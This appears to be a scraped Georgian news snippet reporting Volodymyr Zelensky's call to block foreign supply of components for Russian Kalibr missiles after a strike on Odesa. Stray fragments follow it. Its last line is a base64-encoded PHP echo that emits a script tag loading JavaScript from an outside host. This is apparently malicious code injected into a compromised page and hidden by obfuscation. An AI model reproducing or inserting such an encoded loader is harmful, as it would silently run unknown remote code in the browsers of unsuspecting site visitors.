celsiusi
ავერსი შნაიდერი

უკრაინის პრეზიდენტის, ვოლოდიმირ ზელენსკის განცხადებით, მსოფლიოს აქვს შესაძლებლობა რუსული რაკეტების წარმოებისთვის საჭირო კომპონენტების მიწოდების გზები დაბლოკოს.

„რუსმა არაადამიანებმა „კალიბრებით“ ოდესაზე მორიგი სარაკეტო შეტევა განახორციელეს. ამ „კალიბრების“ ათობით კომპონენტი რუსეთს სხვა ქვეყნებიდან მიეწოდა. აშკარაა, რომ ყოველი ასეთი მიწოდების გზა ტერორის გაზრდის გზას წარმოადგენს. მსოფლიოს აქვს ინსტრუმენტები, რომ დაბლოკოს ყველა ასეთი გზა - ყველა ქვეყნიდან, ყველა კომპანიისგან, რომლის კომპონენტებს რუსი რაკეტების მწარმოებლები იყენებენ“, - აღნიშნა ზელენსკიმ.

მისი თქმით, უკრაინის ხელისუფლება რუსეთის სარაკეტო წარმოების საკითხზე პარტნიორებთან კომუნიკაციას აგრძელებს.

434
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");